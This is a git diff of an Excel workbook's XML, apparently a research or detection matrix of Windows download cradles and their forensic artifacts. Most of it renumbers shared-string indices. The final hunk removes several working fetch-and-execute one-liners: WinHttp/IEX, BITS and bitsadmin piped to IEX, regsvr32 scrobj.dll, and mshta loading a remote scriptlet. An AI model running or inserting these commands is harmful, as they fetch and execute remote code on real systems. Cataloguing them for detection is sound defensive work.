       <c r="B6" s="17" t="s">
-        <v>173</v>
+        <v>172</v>
       </c>
       <c r="M6" s="32"/>
     </row>
@@ -12093,10 +12092,10 @@
     </row>
     <row r="8" spans="1:13" ht="192">
       <c r="A8" s="26" t="s">
-        <v>108</v>
+        <v>107</v>
       </c>
       <c r="B8" s="17" t="s">
-        <v>172</v>
+        <v>171</v>
       </c>
       <c r="M8" s="33"/>
     </row>
@@ -12106,10 +12105,10 @@
     </row>
     <row r="10" spans="1:13" ht="144">
       <c r="A10" s="26" t="s">
-        <v>59</v>
+        <v>58</v>
       </c>
       <c r="B10" s="17" t="s">
-        <v>174</v>
+        <v>173</v>
       </c>
       <c r="M10" s="32"/>
     </row>
@@ -12119,10 +12118,10 @@
     </row>
     <row r="12" spans="1:13" ht="112">
       <c r="A12" s="26" t="s">
-        <v>103</v>
+        <v>102</v>
       </c>
       <c r="B12" s="17" t="s">
-        <v>175</v>
+        <v>174</v>
       </c>
       <c r="M12" s="32"/>
     </row>
@@ -12132,10 +12131,10 @@
     </row>
     <row r="14" spans="1:13" ht="112">
       <c r="A14" s="10" t="s">
-        <v>60</v>
+        <v>59</v>
       </c>
       <c r="B14" s="17" t="s">
-        <v>175</v>
+        <v>174</v>
       </c>
     </row>
     <row r="15" spans="1:13" ht="7" customHeight="1">
@@ -12144,10 +12143,10 @@
     </row>
     <row r="16" spans="1:13" ht="128">
       <c r="A16" s="27" t="s">
-        <v>61</v>
+        <v>60</v>
       </c>
       <c r="B16" s="6" t="s">
-        <v>132</v>
+        <v>131</v>
       </c>
     </row>
     <row r="17" spans="1:2" ht="7" customHeight="1">
@@ -12156,10 +12155,10 @@
     </row>
     <row r="18" spans="1:2" ht="128">
       <c r="A18" s="27" t="s">
-        <v>62</v>
+        <v>61</v>
       </c>
       <c r="B18" s="6" t="s">
-        <v>132</v>
+        <v>131</v>
       </c>
     </row>
     <row r="19" spans="1:2" ht="7" customHeight="1">
@@ -12168,10 +12167,10 @@
     </row>
     <row r="20" spans="1:2" ht="208">
       <c r="A20" s="46" t="s">
-        <v>89</v>
+        <v>88</v>
       </c>
       <c r="B20" s="6" t="s">
-        <v>133</v>
+        <v>132</v>
       </c>
     </row>
     <row r="21" spans="1:2" ht="7" customHeight="1">
@@ -12180,10 +12179,10 @@
     </row>
     <row r="22" spans="1:2" ht="409.6">
       <c r="A22" s="27" t="s">
-        <v>91</v>
+        <v>90</v>
       </c>
       <c r="B22" s="6" t="s">
-        <v>134</v>
+        <v>133</v>
       </c>
     </row>
     <row r="23" spans="1:2" ht="7" customHeight="1">
@@ -12195,7 +12194,7 @@
         <v>23</v>
       </c>
       <c r="B24" s="17" t="s">
-        <v>149</v>
+        <v>148</v>
       </c>
     </row>
     <row r="25" spans="1:2" ht="7" customHeight="1">
@@ -12204,10 +12203,10 @@
     </row>
     <row r="26" spans="1:2" ht="96">
       <c r="A26" s="36" t="s">
-        <v>63</v>
+        <v>62</v>
       </c>
       <c r="B26" s="36" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
     </row>
     <row r="27" spans="1:2" ht="7" customHeight="1">
@@ -12216,10 +12215,10 @@
     </row>
     <row r="28" spans="1:2" ht="96">
       <c r="A28" s="36" t="s">
-        <v>64</v>
+        <v>63</v>
       </c>
       <c r="B28" s="36" t="s">
-        <v>137</v>
+        <v>136</v>
       </c>
     </row>
     <row r="29" spans="1:2" ht="7" customHeight="1">
@@ -12228,10 +12227,10 @@
     </row>
     <row r="30" spans="1:2" ht="32">
       <c r="A30" s="36" t="s">
-        <v>65</v>
+        <v>64</v>
       </c>
       <c r="B30" s="36" t="s">
-        <v>102</v>
+        <v>101</v>
       </c>
     </row>
     <row r="31" spans="1:2" ht="7" customHeight="1">
@@ -12240,10 +12239,10 @@
     </row>
     <row r="32" spans="1:2" ht="144">
       <c r="A32" s="36" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B32" s="31" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
     </row>
     <row r="33" spans="1:2" ht="7" customHeight="1">
@@ -12252,10 +12251,10 @@
     </row>
     <row r="34" spans="1:2" ht="128">
       <c r="A34" s="36" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B34" s="36" t="s">
-        <v>104</v>
+        <v>103</v>
       </c>
     </row>
     <row r="35" spans="1:2" ht="7" customHeight="1">
@@ -12264,10 +12263,10 @@
     </row>
     <row r="36" spans="1:2" ht="48">
       <c r="A36" s="51" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B36" s="52" t="s">
-        <v>100</v>
+        <v>99</v>
       </c>
     </row>
     <row r="37" spans="1:2" ht="7" customHeight="1">
@@ -12300,16 +12299,16 @@
   <sheetData>
     <row r="1" spans="1:4">
       <c r="A1" s="12" t="s">
-        <v>46</v>
+        <v>45</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="352">
@@ -12317,13 +12316,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>105</v>
+        <v>104</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>105</v>
+        <v>104</v>
       </c>
       <c r="D2" s="10" t="s">
-        <v>105</v>
+        <v>104</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="64">
@@ -12342,30 +12341,30 @@
     </row>
     <row r="4" spans="1:4" ht="128">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>153</v>
+        <v>152</v>
       </c>
       <c r="C4" s="10" t="s">
-        <v>109</v>
+        <v>108</v>
       </c>
       <c r="D4" s="10" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
+        <v>79</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>80</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>81</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -12387,41 +12386,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
+        <v>161</v>
+      </c>
+      <c r="C7" s="27" t="s">
         <v>162</v>
       </c>
-      <c r="C7" s="27" t="s">
-        <v>163</v>
-      </c>
       <c r="D7" s="27" t="s">
-        <v>198</v>
+        <v>197</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="152">
       <c r="A8" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>151</v>
+        <v>150</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>118</v>
+        <v>117</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>118</v>
+        <v>117</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>152</v>
+        <v>151</v>
       </c>
       <c r="C9" s="6" t="s">
+        <v>110</v>
+      </c>
+      <c r="D9" s="27" t="s">
         <v>111</v>
-      </c>
-      <c r="D9" s="27" t="s">
-        <v>112</v>
       </c>
     </row>
   </sheetData>
@@ -12454,13 +12453,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="45" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="208">
@@ -12468,13 +12467,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>106</v>
+        <v>105</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>106</v>
+        <v>105</v>
       </c>
       <c r="D2" s="27" t="s">
-        <v>49</v>
+        <v>48</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="32">
@@ -12482,41 +12481,41 @@
         <v>2</v>
       </c>
       <c r="B3" s="10" t="s">
-        <v>71</v>
+        <v>70</v>
       </c>
       <c r="C3" s="10" t="s">
-        <v>71</v>
+        <v>70</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>153</v>
+        <v>152</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>17</v>
       </c>
       <c r="D4" s="45" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
+        <v>79</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>80</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>81</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -12530,7 +12529,7 @@
         <v>12</v>
       </c>
       <c r="D6" s="45" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
     <row r="7" spans="1:4" ht="409.6">
@@ -12538,41 +12537,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
+        <v>163</v>
+      </c>
+      <c r="C7" s="7" t="s">
         <v>164</v>
       </c>
-      <c r="C7" s="7" t="s">
-        <v>165</v>
-      </c>
       <c r="D7" s="45" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="48">
       <c r="A8" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>122</v>
+        <v>121</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>122</v>
+        <v>121</v>
       </c>
       <c r="D8" s="45" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="B9" s="6" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="C9" s="6" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="D9" s="45" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
   </sheetData>
@@ -12606,13 +12605,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
     </row>
     <row r="2" spans="1:6" ht="160">
@@ -12636,41 +12635,41 @@
         <v>2</v>
       </c>
       <c r="B3" s="10" t="s">
-        <v>120</v>
+        <v>119</v>
       </c>
       <c r="C3" s="10" t="s">
-        <v>120</v>
+        <v>119</v>
       </c>
       <c r="D3" s="44" t="s">
-        <v>92</v>
+        <v>91</v>
       </c>
     </row>
     <row r="4" spans="1:6" ht="128">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>155</v>
+        <v>154</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="10" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
     </row>
     <row r="5" spans="1:6">
       <c r="A5" s="13" t="s">
-        <v>80</v>
+        <v>79</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="6" spans="1:6" ht="64">
@@ -12692,41 +12691,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="17" t="s">
+        <v>208</v>
+      </c>
+      <c r="C7" s="17" t="s">
         <v>209</v>
       </c>
-      <c r="C7" s="17" t="s">
+      <c r="D7" s="27" t="s">
         <v>210</v>
-      </c>
-      <c r="D7" s="27" t="s">
-        <v>211</v>
       </c>
     </row>
     <row r="8" spans="1:6" ht="290">
       <c r="A8" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B8" s="17" t="s">
+        <v>165</v>
+      </c>
+      <c r="C8" s="17" t="s">
         <v>166</v>
       </c>
-      <c r="C8" s="17" t="s">
-        <v>167</v>
-      </c>
       <c r="D8" s="17" t="s">
-        <v>200</v>
+        <v>199</v>
       </c>
     </row>
     <row r="9" spans="1:6" ht="409.6">
       <c r="A9" s="13" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="B9" s="17" t="s">
-        <v>161</v>
+        <v>160</v>
       </c>
       <c r="C9" s="17" t="s">
-        <v>117</v>
+        <v>116</v>
       </c>
       <c r="D9" s="17" t="s">
-        <v>50</v>
+        <v>49</v>
       </c>
     </row>
   </sheetData>
@@ -12759,13 +12758,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="144">
@@ -12787,41 +12786,41 @@
         <v>2</v>
       </c>
       <c r="B3" s="26" t="s">
-        <v>119</v>
+        <v>118</v>
       </c>
       <c r="C3" s="26" t="s">
-        <v>119</v>
+        <v>118</v>
       </c>
       <c r="D3" s="44" t="s">
-        <v>93</v>
+        <v>92</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="128">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>155</v>
+        <v>154</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="10" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>80</v>
+        <v>79</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>82</v>
+        <v>81</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>82</v>
+        <v>81</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>82</v>
+        <v>81</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -12835,7 +12834,7 @@
         <v>11</v>
       </c>
       <c r="D6" s="17" t="s">
-        <v>53</v>
+        <v>52</v>
       </c>
     </row>
     <row r="7" spans="1:4" ht="409.6">
@@ -12843,41 +12842,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
+        <v>205</v>
+      </c>
+      <c r="C7" s="17" t="s">
         <v>206</v>
       </c>
-      <c r="C7" s="17" t="s">
+      <c r="D7" s="27" t="s">
         <v>207</v>
-      </c>
-      <c r="D7" s="27" t="s">
-        <v>208</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="332">
       <c r="A8" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B8" s="54" t="s">
-        <v>168</v>
+        <v>167</v>
       </c>
       <c r="C8" s="17" t="s">
-        <v>124</v>
+        <v>123</v>
       </c>
       <c r="D8" s="17" t="s">
-        <v>199</v>
+        <v>198</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="B9" s="28" t="s">
-        <v>125</v>
+        <v>124</v>
       </c>
       <c r="C9" s="28" t="s">
-        <v>125</v>
+        <v>124</v>
       </c>
       <c r="D9" s="28" t="s">
-        <v>125</v>
+        <v>124</v>
       </c>
     </row>
   </sheetData>
@@ -12910,13 +12909,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="128">
@@ -12944,35 +12943,35 @@
         <v>1</v>
       </c>
       <c r="D3" s="27" t="s">
-        <v>94</v>
+        <v>93</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="27" t="s">
-        <v>154</v>
+        <v>153</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>20</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>52</v>
+        <v>51</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>80</v>
+        <v>79</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>83</v>
+        <v>82</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>83</v>
+        <v>82</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>83</v>
+        <v>82</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="112">
@@ -12980,7 +12979,7 @@
         <v>7</v>
       </c>
       <c r="B6" s="17" t="s">
-        <v>158</v>
+        <v>157</v>
       </c>
       <c r="C6" s="17" t="s">
         <v>10</v>
@@ -12994,35 +12993,35 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
+        <v>203</v>
+      </c>
+      <c r="C7" s="50" t="s">
         <v>204</v>
       </c>
-      <c r="C7" s="50" t="s">
-        <v>205</v>
-      </c>
       <c r="D7" s="27" t="s">
-        <v>220</v>
+        <v>219</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="246">
       <c r="A8" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B8" s="30" t="s">
-        <v>159</v>
+        <v>158</v>
       </c>
       <c r="C8" s="30" t="s">
-        <v>121</v>
+        <v>120</v>
       </c>
       <c r="D8" s="30" t="s">
-        <v>201</v>
+        <v>200</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="B9" s="28" t="s">
-        <v>160</v>
+        <v>159</v>
       </c>
       <c r="C9" s="28" t="s">
         <v>13</v>
@@ -13043,8 +13042,8 @@
   <dimension ref="A1:D9"/>
   <sheetViews>
     <sheetView workbookViewId="0">
-      <pane xSplit="1" topLeftCell="C1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="B7" sqref="B7"/>
+      <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
+      <selection pane="topRight" activeCell="A2" sqref="A2"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -13061,27 +13060,27 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>45</v>
-      </c>
-    </row>
-    <row r="2" spans="1:4" ht="112">
+        <v>44</v>
+      </c>
+    </row>
+    <row r="2" spans="1:4" ht="96">
       <c r="A2" s="13" t="s">
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>34</v>
+        <v>226</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>34</v>
+        <v>226</v>
       </c>
       <c r="D2" s="10" t="s">
-        <v>34</v>
+        <v>226</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="32">
@@ -13095,35 +13094,35 @@
         <v>3</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>95</v>
+        <v>94</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>169</v>
+        <v>168</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>55</v>
+        <v>54</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
+        <v>79</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>80</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>81</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -13145,41 +13144,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="7" t="s">
+        <v>169</v>
+      </c>
+      <c r="C7" s="7" t="s">
         <v>170</v>
       </c>
-      <c r="C7" s="7" t="s">
-        <v>171</v>
-      </c>
       <c r="D7" s="55" t="s">
-        <v>202</v>
+        <v>201</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="32">
       <c r="A9" s="13" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>203</v>
+        <v>202</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>203</v>
+        <v>202</v>
       </c>
       <c r="D9" s="7" t="s">
-        <v>203</v>
+        <v>202</v>
       </c>
     </row>
   </sheetData>
@@ -13212,13 +13211,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>45</v>
+        <v>44</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="112">
@@ -13246,35 +13245,35 @@
         <v>4</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>95</v>
+        <v>94</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="32" customHeight="1">
       <c r="A4" s="14" t="s">
-        <v>113</v>
+        <v>112</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>169</v>
+        <v>168</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>55</v>
+        <v>54</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
+        <v>79</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>80</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>81</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>81</v>
+        <v>80</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -13296,41 +13295,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>177</v>
+        <v>176</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>176</v>
+        <v>175</v>
       </c>
       <c r="D7" s="35" t="s">
-        <v>212</v>
+        <v>211</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="64">
       <c r="A9" s="13" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>58</v>
+        <v>57</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>58</v>
+        <v>57</v>
       </c>
       <c r="D9" s="7" t="s">
-        <v>58</v>
+        <v>57</v>
       </c>
     </row>
   </sheetData>

--- a/other/DownloadCradle/DownloadCradle.xlsx
+++ b/other/DownloadCradle/DownloadCradle.xlsx
@@ -37,7 +37,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="651" uniqueCount="227">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="651" uniqueCount="228">
   <si>
     <t>None</t>
   </si>
@@ -569,56 +569,6 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell IE COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$comIE=New-Object -ComObject InternetExplorer.Application;While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Visible=$False;$comIE.Silent=$True;$comIE.Navigate($Url);While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Document.Body.InnerText;$comIE.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comIE) 
-Powershell version: 2+
-Microsoft Internet Explorer
-Proxy: proxy aware</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell WinHttp COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$comWinHttp=new-object -com WinHttp.WinHttpRequest.5.1;$comWinHttp.open('GET',$Url,$false);$comWinHttp.send();IEX $comWinHttp.responseText 
-Powershell version: 2+
-Proxy: not proxy aware
-memory only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
         <rFont val="Calibri"/>
         <family val="2"/>
         <scheme val="minor"/>
@@ -685,108 +635,6 @@
       <t xml:space="preserve">
 Powershell Version 2+
 Memory Only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Microsoft BITS framework via Powershell commandlet</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Start-BitsTransfer $Url $Outfile; GC $Outfile|IEX
-Powershell 2+
-Disk-based - Downloads to specified file
-Works in CLM (Constrained Language Mode)</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Microsoft BITS framework via Bitsadmin.exe</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$NULL=bitsadmin /transfer /Download $Url $Outfile; GC $Outfile | IEX
-Powershell 2+
-Disk-based - Downloads to specified file</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Squiglydoo - regsvr32.exe as a download cradle</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> (not specifically powershell)
-regsvr32.exe /s /u /i:$Url scrobj.dll</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>MSHTA.EXE</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-cmd /c 'mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/mgreen27/testing/master/mshta.sct").Exec();close()'
-</t>
     </r>
   </si>
   <si>
@@ -1006,20 +854,58 @@
     <t>nslookup.exe</t>
   </si>
   <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)"/>
-      </rPr>
-      <t>C# inline</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)"/>
+    <t>None of interest - minor temp writes by Powershell.exe
+C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*.temp
